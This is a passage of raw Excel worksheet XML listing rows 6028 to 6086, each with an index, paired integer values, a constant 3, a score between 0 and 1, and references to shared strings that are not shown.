        <v>1689</v>
      </c>
      <c r="D6028">
        <v>3</v>
      </c>
      <c r="E6028">
        <v>0.64999997615814209</v>
      </c>
      <c r="F6028" t="s">
        <v>10120</v>
      </c>
      <c r="G6028" t="s">
        <v>11924</v>
      </c>
      <c r="H6028" t="s">
        <v>11925</v>
      </c>
    </row>
    <row r="6029" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6029" s="1">
        <v>6027</v>
      </c>
      <c r="B6029">
        <v>1705</v>
      </c>
      <c r="C6029">
        <v>1705</v>
      </c>
      <c r="D6029">
        <v>3</v>
      </c>
      <c r="E6029">
        <v>0.60409998893737793</v>
      </c>
      <c r="F6029" t="s">
        <v>10120</v>
      </c>
      <c r="G6029" t="s">
        <v>11926</v>
      </c>
      <c r="H6029" t="s">
        <v>11927</v>
      </c>
    </row>
    <row r="6030" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6030" s="1">
        <v>6028</v>
      </c>
      <c r="B6030">
        <v>1709</v>
      </c>
      <c r="C6030">
        <v>1709</v>
      </c>
      <c r="D6030">
        <v>3</v>
      </c>
      <c r="E6030">
        <v>0.83619999885559082</v>
      </c>
      <c r="F6030" t="s">
        <v>10120</v>
      </c>
      <c r="G6030" t="s">
        <v>11928</v>
      </c>
      <c r="H6030" t="s">
        <v>11929</v>
      </c>
    </row>
    <row r="6031" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6031" s="1">
        <v>6029</v>
      </c>
      <c r="B6031">
        <v>1713</v>
      </c>
      <c r="C6031">
        <v>1713</v>
      </c>
      <c r="D6031">
        <v>3</v>
      </c>
      <c r="E6031">
        <v>0.93680000305175781</v>
      </c>
      <c r="F6031" t="s">
        <v>10120</v>
      </c>
      <c r="G6031" t="s">
        <v>11930</v>
      </c>
      <c r="H6031" t="s">
        <v>11931</v>
      </c>
    </row>
    <row r="6032" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6032" s="1">
        <v>6030</v>
      </c>
      <c r="B6032">
        <v>1717</v>
      </c>
      <c r="C6032">
        <v>1717</v>
      </c>
      <c r="D6032">
        <v>3</v>
      </c>
      <c r="E6032">
        <v>0.87370002269744873</v>
      </c>
      <c r="F6032" t="s">
        <v>10120</v>
      </c>
      <c r="G6032" t="s">
        <v>11932</v>
      </c>
      <c r="H6032" t="s">
        <v>11933</v>
      </c>
    </row>
    <row r="6033" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6033" s="1">
        <v>6031</v>
      </c>
      <c r="B6033">
        <v>1723</v>
      </c>
      <c r="C6033">
        <v>1723</v>
      </c>
      <c r="D6033">
        <v>3</v>
      </c>
      <c r="E6033">
        <v>0.38650000095367432</v>
      </c>
      <c r="F6033" t="s">
        <v>10120</v>
      </c>
      <c r="G6033" t="s">
        <v>11934</v>
      </c>
      <c r="H6033" t="s">
        <v>11935</v>
      </c>
    </row>
    <row r="6034" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6034" s="1">
        <v>6032</v>
      </c>
      <c r="B6034">
        <v>1737</v>
      </c>
      <c r="C6034">
        <v>1737</v>
      </c>
      <c r="D6034">
        <v>3</v>
      </c>
      <c r="E6034">
        <v>0.35479998588562012</v>
      </c>
      <c r="F6034" t="s">
        <v>10120</v>
      </c>
      <c r="G6034" t="s">
        <v>11936</v>
      </c>
      <c r="H6034" t="s">
        <v>11937</v>
      </c>
    </row>
    <row r="6035" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6035" s="1">
        <v>6033</v>
      </c>
      <c r="B6035">
        <v>1650</v>
      </c>
      <c r="C6035">
        <v>1650</v>
      </c>
      <c r="D6035">
        <v>3</v>
      </c>
      <c r="E6035">
        <v>0.99229997396469116</v>
      </c>
      <c r="F6035" t="s">
        <v>10120</v>
      </c>
      <c r="G6035" t="s">
        <v>11938</v>
      </c>
      <c r="H6035" t="s">
        <v>11939</v>
      </c>
    </row>
    <row r="6036" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6036" s="1">
        <v>6034</v>
      </c>
      <c r="B6036">
        <v>1746</v>
      </c>
      <c r="C6036">
        <v>1746</v>
      </c>
      <c r="D6036">
        <v>3</v>
      </c>
      <c r="E6036">
        <v>0.75290000438690186</v>
      </c>
      <c r="F6036" t="s">
        <v>10120</v>
      </c>
      <c r="G6036" t="s">
        <v>11940</v>
      </c>
      <c r="H6036" t="s">
        <v>11941</v>
      </c>
    </row>
    <row r="6037" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6037" s="1">
        <v>6035</v>
      </c>
      <c r="B6037">
        <v>1747</v>
      </c>
      <c r="C6037">
        <v>1747</v>
      </c>
      <c r="D6037">
        <v>3</v>
      </c>
      <c r="E6037">
        <v>0.57069998979568481</v>
      </c>
      <c r="F6037" t="s">
        <v>10120</v>
      </c>
      <c r="G6037" t="s">
        <v>11942</v>
      </c>
      <c r="H6037" t="s">
        <v>11943</v>
      </c>
    </row>
    <row r="6038" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6038" s="1">
        <v>6036</v>
      </c>
      <c r="B6038">
        <v>1750</v>
      </c>
      <c r="C6038">
        <v>1750</v>
      </c>
      <c r="D6038">
        <v>3</v>
      </c>
      <c r="E6038">
        <v>0.45269998908042908</v>
      </c>
      <c r="F6038" t="s">
        <v>10120</v>
      </c>
      <c r="G6038" t="s">
        <v>11944</v>
      </c>
      <c r="H6038" t="s">
        <v>11945</v>
      </c>
    </row>
    <row r="6039" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6039" s="1">
        <v>6037</v>
      </c>
      <c r="B6039">
        <v>1759</v>
      </c>
      <c r="C6039">
        <v>1759</v>
      </c>
      <c r="D6039">
        <v>3</v>
      </c>
      <c r="E6039">
        <v>0.56129997968673706</v>
      </c>
      <c r="F6039" t="s">
        <v>10120</v>
      </c>
      <c r="G6039" t="s">
        <v>11946</v>
      </c>
      <c r="H6039" t="s">
        <v>11947</v>
      </c>
    </row>
    <row r="6040" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6040" s="1">
        <v>6038</v>
      </c>
      <c r="B6040">
        <v>1764</v>
      </c>
      <c r="C6040">
        <v>1764</v>
      </c>
      <c r="D6040">
        <v>3</v>
      </c>
      <c r="E6040">
        <v>0.71060001850128174</v>
      </c>
      <c r="F6040" t="s">
        <v>10120</v>
      </c>
      <c r="G6040" t="s">
        <v>11948</v>
      </c>
      <c r="H6040" t="s">
        <v>11949</v>
      </c>
    </row>
    <row r="6041" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6041" s="1">
        <v>6039</v>
      </c>
      <c r="B6041">
        <v>1830</v>
      </c>
      <c r="C6041">
        <v>1830</v>
      </c>
      <c r="D6041">
        <v>3</v>
      </c>
      <c r="E6041">
        <v>0.72780001163482666</v>
      </c>
      <c r="F6041" t="s">
        <v>10120</v>
      </c>
      <c r="G6041" t="s">
        <v>11950</v>
      </c>
      <c r="H6041" t="s">
        <v>11951</v>
      </c>
    </row>
    <row r="6042" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6042" s="1">
        <v>6040</v>
      </c>
      <c r="B6042">
        <v>1831</v>
      </c>
      <c r="C6042">
        <v>1831</v>
      </c>
      <c r="D6042">
        <v>3</v>
      </c>
      <c r="E6042">
        <v>0.43369999527931208</v>
      </c>
      <c r="F6042" t="s">
        <v>10120</v>
      </c>
      <c r="G6042" t="s">
        <v>11952</v>
      </c>
      <c r="H6042" t="s">
        <v>11953</v>
      </c>
    </row>
    <row r="6043" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6043" s="1">
        <v>6041</v>
      </c>
      <c r="B6043">
        <v>1832</v>
      </c>
      <c r="C6043">
        <v>1832</v>
      </c>
      <c r="D6043">
        <v>3</v>
      </c>
      <c r="E6043">
        <v>0.57190001010894775</v>
      </c>
      <c r="F6043" t="s">
        <v>10120</v>
      </c>
      <c r="G6043" t="s">
        <v>11954</v>
      </c>
      <c r="H6043" t="s">
        <v>11955</v>
      </c>
    </row>
    <row r="6044" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6044" s="1">
        <v>6042</v>
      </c>
      <c r="B6044">
        <v>1585</v>
      </c>
      <c r="C6044">
        <v>1585</v>
      </c>
      <c r="D6044">
        <v>3</v>
      </c>
      <c r="E6044">
        <v>0.58840000629425049</v>
      </c>
      <c r="F6044" t="s">
        <v>10120</v>
      </c>
      <c r="G6044" t="s">
        <v>11956</v>
      </c>
      <c r="H6044" t="s">
        <v>11957</v>
      </c>
    </row>
    <row r="6045" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6045" s="1">
        <v>6043</v>
      </c>
      <c r="B6045">
        <v>1966</v>
      </c>
      <c r="C6045">
        <v>1966</v>
      </c>
      <c r="D6045">
        <v>3</v>
      </c>
      <c r="E6045">
        <v>0.62620002031326294</v>
      </c>
      <c r="F6045" t="s">
        <v>10120</v>
      </c>
      <c r="G6045" t="s">
        <v>11958</v>
      </c>
      <c r="H6045" t="s">
        <v>11959</v>
      </c>
    </row>
    <row r="6046" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6046" s="1">
        <v>6044</v>
      </c>
      <c r="B6046">
        <v>1968</v>
      </c>
      <c r="C6046">
        <v>1968</v>
      </c>
      <c r="D6046">
        <v>3</v>
      </c>
      <c r="E6046">
        <v>0.6776999831199646</v>
      </c>
      <c r="F6046" t="s">
        <v>10120</v>
      </c>
      <c r="G6046" t="s">
        <v>11960</v>
      </c>
      <c r="H6046" t="s">
        <v>11961</v>
      </c>
    </row>
    <row r="6047" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6047" s="1">
        <v>6045</v>
      </c>
      <c r="B6047">
        <v>1577</v>
      </c>
      <c r="C6047">
        <v>1577</v>
      </c>
      <c r="D6047">
        <v>3</v>
      </c>
      <c r="E6047">
        <v>0.76239997148513794</v>
      </c>
      <c r="F6047" t="s">
        <v>10120</v>
      </c>
      <c r="G6047" t="s">
        <v>11962</v>
      </c>
      <c r="H6047" t="s">
        <v>11963</v>
      </c>
    </row>
    <row r="6048" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6048" s="1">
        <v>6046</v>
      </c>
      <c r="B6048">
        <v>1972</v>
      </c>
      <c r="C6048">
        <v>1972</v>
      </c>
      <c r="D6048">
        <v>3</v>
      </c>
      <c r="E6048">
        <v>0.8554999828338623</v>
      </c>
      <c r="F6048" t="s">
        <v>10120</v>
      </c>
      <c r="G6048" t="s">
        <v>11964</v>
      </c>
      <c r="H6048" t="s">
        <v>11965</v>
      </c>
    </row>
    <row r="6049" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6049" s="1">
        <v>6047</v>
      </c>
      <c r="B6049">
        <v>1973</v>
      </c>
      <c r="C6049">
        <v>1973</v>
      </c>
      <c r="D6049">
        <v>3</v>
      </c>
      <c r="E6049">
        <v>0.803600013256073</v>
      </c>
      <c r="F6049" t="s">
        <v>10120</v>
      </c>
      <c r="G6049" t="s">
        <v>11966</v>
      </c>
      <c r="H6049" t="s">
        <v>11967</v>
      </c>
    </row>
    <row r="6050" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6050" s="1">
        <v>6048</v>
      </c>
      <c r="B6050">
        <v>1974</v>
      </c>
      <c r="C6050">
        <v>1974</v>
      </c>
      <c r="D6050">
        <v>3</v>
      </c>
      <c r="E6050">
        <v>0.77020001411437988</v>
      </c>
      <c r="F6050" t="s">
        <v>10120</v>
      </c>
      <c r="G6050" t="s">
        <v>11968</v>
      </c>
      <c r="H6050" t="s">
        <v>11969</v>
      </c>
    </row>
    <row r="6051" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6051" s="1">
        <v>6049</v>
      </c>
      <c r="B6051">
        <v>1570</v>
      </c>
      <c r="C6051">
        <v>1570</v>
      </c>
      <c r="D6051">
        <v>3</v>
      </c>
      <c r="E6051">
        <v>0.57870000600814819</v>
      </c>
      <c r="F6051" t="s">
        <v>10120</v>
      </c>
      <c r="G6051" t="s">
        <v>11970</v>
      </c>
      <c r="H6051" t="s">
        <v>11971</v>
      </c>
    </row>
    <row r="6052" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6052" s="1">
        <v>6050</v>
      </c>
      <c r="B6052">
        <v>1561</v>
      </c>
      <c r="C6052">
        <v>1561</v>
      </c>
      <c r="D6052">
        <v>3</v>
      </c>
      <c r="E6052">
        <v>0.52719998359680176</v>
      </c>
      <c r="F6052" t="s">
        <v>10120</v>
      </c>
      <c r="G6052" t="s">
        <v>11972</v>
      </c>
      <c r="H6052" t="s">
        <v>11973</v>
      </c>
    </row>
    <row r="6053" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6053" s="1">
        <v>6051</v>
      </c>
      <c r="B6053">
        <v>1985</v>
      </c>
      <c r="C6053">
        <v>1985</v>
      </c>
      <c r="D6053">
        <v>3</v>
      </c>
      <c r="E6053">
        <v>0.45280000567436218</v>
      </c>
      <c r="F6053" t="s">
        <v>10120</v>
      </c>
      <c r="G6053" t="s">
        <v>11974</v>
      </c>
      <c r="H6053" t="s">
        <v>11975</v>
      </c>
    </row>
    <row r="6054" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6054" s="1">
        <v>6052</v>
      </c>
      <c r="B6054">
        <v>1556</v>
      </c>
      <c r="C6054">
        <v>1556</v>
      </c>
      <c r="D6054">
        <v>3</v>
      </c>
      <c r="E6054">
        <v>0.54210001230239868</v>
      </c>
      <c r="F6054" t="s">
        <v>10120</v>
      </c>
      <c r="G6054" t="s">
        <v>11976</v>
      </c>
      <c r="H6054" t="s">
        <v>11977</v>
      </c>
    </row>
    <row r="6055" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6055" s="1">
        <v>6053</v>
      </c>
      <c r="B6055">
        <v>1991</v>
      </c>
      <c r="C6055">
        <v>1991</v>
      </c>
      <c r="D6055">
        <v>3</v>
      </c>
      <c r="E6055">
        <v>0.99180001020431519</v>
      </c>
      <c r="F6055" t="s">
        <v>10120</v>
      </c>
      <c r="G6055" t="s">
        <v>11978</v>
      </c>
      <c r="H6055" t="s">
        <v>11979</v>
      </c>
    </row>
    <row r="6056" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6056" s="1">
        <v>6054</v>
      </c>
      <c r="B6056">
        <v>1552</v>
      </c>
      <c r="C6056">
        <v>1552</v>
      </c>
      <c r="D6056">
        <v>3</v>
      </c>
      <c r="E6056">
        <v>0.88429999351501465</v>
      </c>
      <c r="F6056" t="s">
        <v>10120</v>
      </c>
      <c r="G6056" t="s">
        <v>11980</v>
      </c>
      <c r="H6056" t="s">
        <v>11981</v>
      </c>
    </row>
    <row r="6057" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6057" s="1">
        <v>6055</v>
      </c>
      <c r="B6057">
        <v>1998</v>
      </c>
      <c r="C6057">
        <v>1998</v>
      </c>
      <c r="D6057">
        <v>3</v>
      </c>
      <c r="E6057">
        <v>0.67229998111724854</v>
      </c>
      <c r="F6057" t="s">
        <v>10120</v>
      </c>
      <c r="G6057" t="s">
        <v>11982</v>
      </c>
      <c r="H6057" t="s">
        <v>11983</v>
      </c>
    </row>
    <row r="6058" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6058" s="1">
        <v>6056</v>
      </c>
      <c r="B6058">
        <v>2002</v>
      </c>
      <c r="C6058">
        <v>2002</v>
      </c>
      <c r="D6058">
        <v>3</v>
      </c>
      <c r="E6058">
        <v>0.59310001134872437</v>
      </c>
      <c r="F6058" t="s">
        <v>10120</v>
      </c>
      <c r="G6058" t="s">
        <v>11984</v>
      </c>
      <c r="H6058" t="s">
        <v>11985</v>
      </c>
    </row>
    <row r="6059" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6059" s="1">
        <v>6057</v>
      </c>
      <c r="B6059">
        <v>1550</v>
      </c>
      <c r="C6059">
        <v>1550</v>
      </c>
      <c r="D6059">
        <v>3</v>
      </c>
      <c r="E6059">
        <v>0.69239997863769531</v>
      </c>
      <c r="F6059" t="s">
        <v>10120</v>
      </c>
      <c r="G6059" t="s">
        <v>11986</v>
      </c>
      <c r="H6059" t="s">
        <v>11987</v>
      </c>
    </row>
    <row r="6060" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6060" s="1">
        <v>6058</v>
      </c>
      <c r="B6060">
        <v>1548</v>
      </c>
      <c r="C6060">
        <v>1548</v>
      </c>
      <c r="D6060">
        <v>3</v>
      </c>
      <c r="E6060">
        <v>0.61129999160766602</v>
      </c>
      <c r="F6060" t="s">
        <v>10120</v>
      </c>
      <c r="G6060" t="s">
        <v>11988</v>
      </c>
      <c r="H6060" t="s">
        <v>11989</v>
      </c>
    </row>
    <row r="6061" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6061" s="1">
        <v>6059</v>
      </c>
      <c r="B6061">
        <v>1591</v>
      </c>
      <c r="C6061">
        <v>1591</v>
      </c>
      <c r="D6061">
        <v>3</v>
      </c>
      <c r="E6061">
        <v>0.99279999732971191</v>
      </c>
      <c r="F6061" t="s">
        <v>10120</v>
      </c>
      <c r="G6061" t="s">
        <v>11990</v>
      </c>
      <c r="H6061" t="s">
        <v>11991</v>
      </c>
    </row>
    <row r="6062" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6062" s="1">
        <v>6060</v>
      </c>
      <c r="B6062">
        <v>1944</v>
      </c>
      <c r="C6062">
        <v>1944</v>
      </c>
      <c r="D6062">
        <v>3</v>
      </c>
      <c r="E6062">
        <v>0.39930000901222229</v>
      </c>
      <c r="F6062" t="s">
        <v>10120</v>
      </c>
      <c r="G6062" t="s">
        <v>11992</v>
      </c>
      <c r="H6062" t="s">
        <v>11993</v>
      </c>
    </row>
    <row r="6063" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6063" s="1">
        <v>6061</v>
      </c>
      <c r="B6063">
        <v>1939</v>
      </c>
      <c r="C6063">
        <v>1939</v>
      </c>
      <c r="D6063">
        <v>3</v>
      </c>
      <c r="E6063">
        <v>0.84710001945495605</v>
      </c>
      <c r="F6063" t="s">
        <v>10120</v>
      </c>
      <c r="G6063" t="s">
        <v>11994</v>
      </c>
      <c r="H6063" t="s">
        <v>11995</v>
      </c>
    </row>
    <row r="6064" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6064" s="1">
        <v>6062</v>
      </c>
      <c r="B6064">
        <v>1925</v>
      </c>
      <c r="C6064">
        <v>1925</v>
      </c>
      <c r="D6064">
        <v>3</v>
      </c>
      <c r="E6064">
        <v>0.52499997615814209</v>
      </c>
      <c r="F6064" t="s">
        <v>10120</v>
      </c>
      <c r="G6064" t="s">
        <v>11996</v>
      </c>
      <c r="H6064" t="s">
        <v>11997</v>
      </c>
    </row>
    <row r="6065" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6065" s="1">
        <v>6063</v>
      </c>
      <c r="B6065">
        <v>1837</v>
      </c>
      <c r="C6065">
        <v>1837</v>
      </c>
      <c r="D6065">
        <v>3</v>
      </c>
      <c r="E6065">
        <v>0.61180001497268677</v>
      </c>
      <c r="F6065" t="s">
        <v>10120</v>
      </c>
      <c r="G6065" t="s">
        <v>11998</v>
      </c>
      <c r="H6065" t="s">
        <v>11999</v>
      </c>
    </row>
    <row r="6066" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6066" s="1">
        <v>6064</v>
      </c>
      <c r="B6066">
        <v>1840</v>
      </c>
      <c r="C6066">
        <v>1840</v>
      </c>
      <c r="D6066">
        <v>3</v>
      </c>
      <c r="E6066">
        <v>0.95349997282028198</v>
      </c>
      <c r="F6066" t="s">
        <v>10120</v>
      </c>
      <c r="G6066" t="s">
        <v>12000</v>
      </c>
      <c r="H6066" t="s">
        <v>12001</v>
      </c>
    </row>
    <row r="6067" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6067" s="1">
        <v>6065</v>
      </c>
      <c r="B6067">
        <v>1615</v>
      </c>
      <c r="C6067">
        <v>1615</v>
      </c>
      <c r="D6067">
        <v>3</v>
      </c>
      <c r="E6067">
        <v>0.35260000824928278</v>
      </c>
      <c r="F6067" t="s">
        <v>10120</v>
      </c>
      <c r="G6067" t="s">
        <v>12002</v>
      </c>
      <c r="H6067" t="s">
        <v>12003</v>
      </c>
    </row>
    <row r="6068" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6068" s="1">
        <v>6066</v>
      </c>
      <c r="B6068">
        <v>1846</v>
      </c>
      <c r="C6068">
        <v>1846</v>
      </c>
      <c r="D6068">
        <v>3</v>
      </c>
      <c r="E6068">
        <v>0.51459997892379761</v>
      </c>
      <c r="F6068" t="s">
        <v>10120</v>
      </c>
      <c r="G6068" t="s">
        <v>12004</v>
      </c>
      <c r="H6068" t="s">
        <v>12005</v>
      </c>
    </row>
    <row r="6069" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6069" s="1">
        <v>6067</v>
      </c>
      <c r="B6069">
        <v>1613</v>
      </c>
      <c r="C6069">
        <v>1613</v>
      </c>
      <c r="D6069">
        <v>3</v>
      </c>
      <c r="E6069">
        <v>0.50959998369216919</v>
      </c>
      <c r="F6069" t="s">
        <v>10120</v>
      </c>
      <c r="G6069" t="s">
        <v>12006</v>
      </c>
      <c r="H6069" t="s">
        <v>12007</v>
      </c>
    </row>
    <row r="6070" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6070" s="1">
        <v>6068</v>
      </c>
      <c r="B6070">
        <v>1855</v>
      </c>
      <c r="C6070">
        <v>1855</v>
      </c>
      <c r="D6070">
        <v>3</v>
      </c>
      <c r="E6070">
        <v>0.56559997797012329</v>
      </c>
      <c r="F6070" t="s">
        <v>10120</v>
      </c>
      <c r="G6070" t="s">
        <v>12008</v>
      </c>
      <c r="H6070" t="s">
        <v>12009</v>
      </c>
    </row>
    <row r="6071" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6071" s="1">
        <v>6069</v>
      </c>
      <c r="B6071">
        <v>1856</v>
      </c>
      <c r="C6071">
        <v>1856</v>
      </c>
      <c r="D6071">
        <v>3</v>
      </c>
      <c r="E6071">
        <v>0.62580001354217529</v>
      </c>
      <c r="F6071" t="s">
        <v>10120</v>
      </c>
      <c r="G6071" t="s">
        <v>12010</v>
      </c>
      <c r="H6071" t="s">
        <v>12011</v>
      </c>
    </row>
    <row r="6072" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6072" s="1">
        <v>6070</v>
      </c>
      <c r="B6072">
        <v>1885</v>
      </c>
      <c r="C6072">
        <v>1885</v>
      </c>
      <c r="D6072">
        <v>3</v>
      </c>
      <c r="E6072">
        <v>0.44699999690055853</v>
      </c>
      <c r="F6072" t="s">
        <v>10120</v>
      </c>
      <c r="G6072" t="s">
        <v>12012</v>
      </c>
      <c r="H6072" t="s">
        <v>12013</v>
      </c>
    </row>
    <row r="6073" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6073" s="1">
        <v>6071</v>
      </c>
      <c r="B6073">
        <v>1401</v>
      </c>
      <c r="C6073">
        <v>1401</v>
      </c>
      <c r="D6073">
        <v>3</v>
      </c>
      <c r="E6073">
        <v>0.49909999966621399</v>
      </c>
      <c r="F6073" t="s">
        <v>10120</v>
      </c>
      <c r="G6073" t="s">
        <v>12014</v>
      </c>
      <c r="H6073" t="s">
        <v>12015</v>
      </c>
    </row>
    <row r="6074" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6074" s="1">
        <v>6072</v>
      </c>
      <c r="B6074">
        <v>1887</v>
      </c>
      <c r="C6074">
        <v>1887</v>
      </c>
      <c r="D6074">
        <v>3</v>
      </c>
      <c r="E6074">
        <v>0.94330000877380371</v>
      </c>
      <c r="F6074" t="s">
        <v>10120</v>
      </c>
      <c r="G6074" t="s">
        <v>12016</v>
      </c>
      <c r="H6074" t="s">
        <v>12017</v>
      </c>
    </row>
    <row r="6075" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6075" s="1">
        <v>6073</v>
      </c>
      <c r="B6075">
        <v>1610</v>
      </c>
      <c r="C6075">
        <v>1610</v>
      </c>
      <c r="D6075">
        <v>3</v>
      </c>
      <c r="E6075">
        <v>0.99889999628067017</v>
      </c>
      <c r="F6075" t="s">
        <v>10120</v>
      </c>
      <c r="G6075" t="s">
        <v>12018</v>
      </c>
      <c r="H6075" t="s">
        <v>12019</v>
      </c>
    </row>
    <row r="6076" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6076" s="1">
        <v>6074</v>
      </c>
      <c r="B6076">
        <v>1609</v>
      </c>
      <c r="C6076">
        <v>1609</v>
      </c>
      <c r="D6076">
        <v>3</v>
      </c>
      <c r="E6076">
        <v>0.5755000114440918</v>
      </c>
      <c r="F6076" t="s">
        <v>10120</v>
      </c>
      <c r="G6076" t="s">
        <v>12020</v>
      </c>
      <c r="H6076" t="s">
        <v>12021</v>
      </c>
    </row>
    <row r="6077" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6077" s="1">
        <v>6075</v>
      </c>
      <c r="B6077">
        <v>1913</v>
      </c>
      <c r="C6077">
        <v>1913</v>
      </c>
      <c r="D6077">
        <v>3</v>
      </c>
      <c r="E6077">
        <v>0.32980000972747803</v>
      </c>
      <c r="F6077" t="s">
        <v>10120</v>
      </c>
      <c r="G6077" t="s">
        <v>12022</v>
      </c>
      <c r="H6077" t="s">
        <v>12023</v>
      </c>
    </row>
    <row r="6078" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6078" s="1">
        <v>6076</v>
      </c>
      <c r="B6078">
        <v>1914</v>
      </c>
      <c r="C6078">
        <v>1914</v>
      </c>
      <c r="D6078">
        <v>3</v>
      </c>
      <c r="E6078">
        <v>0.72780001163482666</v>
      </c>
      <c r="F6078" t="s">
        <v>10120</v>
      </c>
      <c r="G6078" t="s">
        <v>12024</v>
      </c>
      <c r="H6078" t="s">
        <v>12025</v>
      </c>
    </row>
    <row r="6079" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6079" s="1">
        <v>6077</v>
      </c>
      <c r="B6079">
        <v>1917</v>
      </c>
      <c r="C6079">
        <v>1917</v>
      </c>
      <c r="D6079">
        <v>3</v>
      </c>
      <c r="E6079">
        <v>0.8937000036239624</v>
      </c>
      <c r="F6079" t="s">
        <v>10120</v>
      </c>
      <c r="G6079" t="s">
        <v>12026</v>
      </c>
      <c r="H6079" t="s">
        <v>12027</v>
      </c>
    </row>
    <row r="6080" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6080" s="1">
        <v>6078</v>
      </c>
      <c r="B6080">
        <v>1921</v>
      </c>
      <c r="C6080">
        <v>1921</v>
      </c>
      <c r="D6080">
        <v>3</v>
      </c>
      <c r="E6080">
        <v>0.42660000920295721</v>
      </c>
      <c r="F6080" t="s">
        <v>10120</v>
      </c>
      <c r="G6080" t="s">
        <v>12028</v>
      </c>
      <c r="H6080" t="s">
        <v>12029</v>
      </c>
    </row>
    <row r="6081" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6081" s="1">
        <v>6079</v>
      </c>
      <c r="B6081">
        <v>1922</v>
      </c>
      <c r="C6081">
        <v>1922</v>
      </c>
      <c r="D6081">
        <v>3</v>
      </c>
      <c r="E6081">
        <v>0.73860001564025879</v>
      </c>
      <c r="F6081" t="s">
        <v>10120</v>
      </c>
      <c r="G6081" t="s">
        <v>12030</v>
      </c>
      <c r="H6081" t="s">
        <v>12031</v>
      </c>
    </row>
    <row r="6082" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6082" s="1">
        <v>6080</v>
      </c>
      <c r="B6082">
        <v>1606</v>
      </c>
      <c r="C6082">
        <v>1606</v>
      </c>
      <c r="D6082">
        <v>3</v>
      </c>
      <c r="E6082">
        <v>0.85470002889633179</v>
      </c>
      <c r="F6082" t="s">
        <v>10120</v>
      </c>
      <c r="G6082" t="s">
        <v>12032</v>
      </c>
      <c r="H6082" t="s">
        <v>12033</v>
      </c>
    </row>
    <row r="6083" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6083" s="1">
        <v>6081</v>
      </c>
      <c r="B6083">
        <v>1899</v>
      </c>
      <c r="C6083">
        <v>1899</v>
      </c>
      <c r="D6083">
        <v>3</v>
      </c>
      <c r="E6083">
        <v>0.88529998064041138</v>
      </c>
      <c r="F6083" t="s">
        <v>10120</v>
      </c>
      <c r="G6083" t="s">
        <v>12034</v>
      </c>
      <c r="H6083" t="s">
        <v>12035</v>
      </c>
    </row>
    <row r="6084" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6084" s="1">
        <v>6082</v>
      </c>
      <c r="B6084">
        <v>2775</v>
      </c>
      <c r="C6084">
        <v>2775</v>
      </c>
      <c r="D6084">
        <v>3</v>
      </c>
      <c r="E6084">
        <v>0.98420000076293945</v>
      </c>
      <c r="F6084" t="s">
        <v>10120</v>
      </c>
      <c r="G6084" t="s">
        <v>12036</v>
      </c>
      <c r="H6084" t="s">
        <v>12037</v>
      </c>
    </row>
    <row r="6085" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6085" s="1">
        <v>6083</v>
      </c>
      <c r="B6085">
        <v>2233</v>
      </c>
      <c r="C6085">
        <v>2233</v>
      </c>
      <c r="D6085">
        <v>3</v>
      </c>
      <c r="E6085">
        <v>0.99779999256134033</v>
      </c>
      <c r="F6085" t="s">
        <v>10120</v>
      </c>
      <c r="G6085" t="s">
        <v>12038</v>
      </c>
      <c r="H6085" t="s">
        <v>12039</v>
      </c>
    </row>
    <row r="6086" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A6086" s="1">
        <v>6084</v>
      </c>
      <c r="B6086">
        <v>1390</v>
      </c>
      <c r="C6086">
        <v>1390</v>
      </c>
      <c r="D6086">
        <v>3</v>
      </c>
      <c r="E6086">
        <v>0.97890001535415649</v>
      </c>
      <c r="F6086" t="s">
        <v>10120</v>
